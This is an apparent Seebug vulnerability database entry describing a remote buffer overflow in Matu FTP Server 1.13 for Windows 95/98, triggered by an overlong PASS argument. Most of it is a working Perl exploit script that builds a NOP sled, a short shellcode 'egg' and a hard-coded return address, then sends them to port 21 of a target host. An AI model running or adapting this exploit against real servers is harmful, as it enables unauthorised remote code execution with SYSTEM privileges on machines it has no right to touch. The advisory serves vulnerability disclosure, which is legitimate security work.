Matu FTP Server 1.13 Buffer Overflow Vulnerability

2014-07-01T00:00:00
ID SSV:75294
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

... Matu FTP是一款免费的FTP服务器程序,可使用在Microsoft Windows 95/98系统下。 ... Matu FTP在处理用户提交的数据时缺少正确充分的检查,可导致远程攻击者进行缓冲区溢出攻击。 ... 攻击者可以提供包含大量字符作为参数的PASS命令提交给Matu FTP服务器,导致服务器程序产生缓冲区溢出,造成堆栈破坏,精心构建字符串参数可能使攻击者以SYSTEM的权限在目标系统上执行任意指令。

                                        
                                            
                                                source: http://www.securityfocus.com/bid/4792/info

Matu FTP Server is a freely available FTP server for Microsoft Windows 95 and 98 operating systems.

Matu FTP Server is vulnerable to a buffer overflow condition.

It is possible for a malicious user to craft a request that will result in code execution on the vulnerable system.

This issue has been reported in Matu FTP Server 1.13. Other versions may also be affected. 

#!/usr/local/bin/perl

#-----------------------------------------------
# MatuFtpServer 1.1.3.0 exploit ( for Windows98 )
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#-----------------------------------------------

use Socket;

$connect_host = "target.example.com";
$port = 21;
$iaddr = inet_aton( $connect_host ) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in( $port, $iaddr );
socket( SOCKET, PF_INET, SOCK_STREAM, 0 ) || die "Socket Error.\n";
connect( SOCKET, $sock_addr ) || die "Connect Error\n";
select( SOCKET ); $|=1; select( STDOUT );

    #egg written by UNYUN (http://www.shadowpenguin.org/)
    #16bytes
$egg  = "\x43\x43\x43\x43\x43\x53\x53\x53";
$egg .= "\xB8\x2D\x23\xF5\xBF\x48\x50\xC3";

    #0x0177F984
$buf  = "\x90" x 1032;
$buf .= $egg;
$buf .= "\x8C\xF9\x77\x01";
$buf .= "A" x 696;

print SOCKET "PASS $buf\r\n";
$hoge = <SOCKET>; print $hoge;

--

#sorry for the bad english

Kanatoko <anvil@jumperz.net>
http://www.jumperz.net/(Japanese)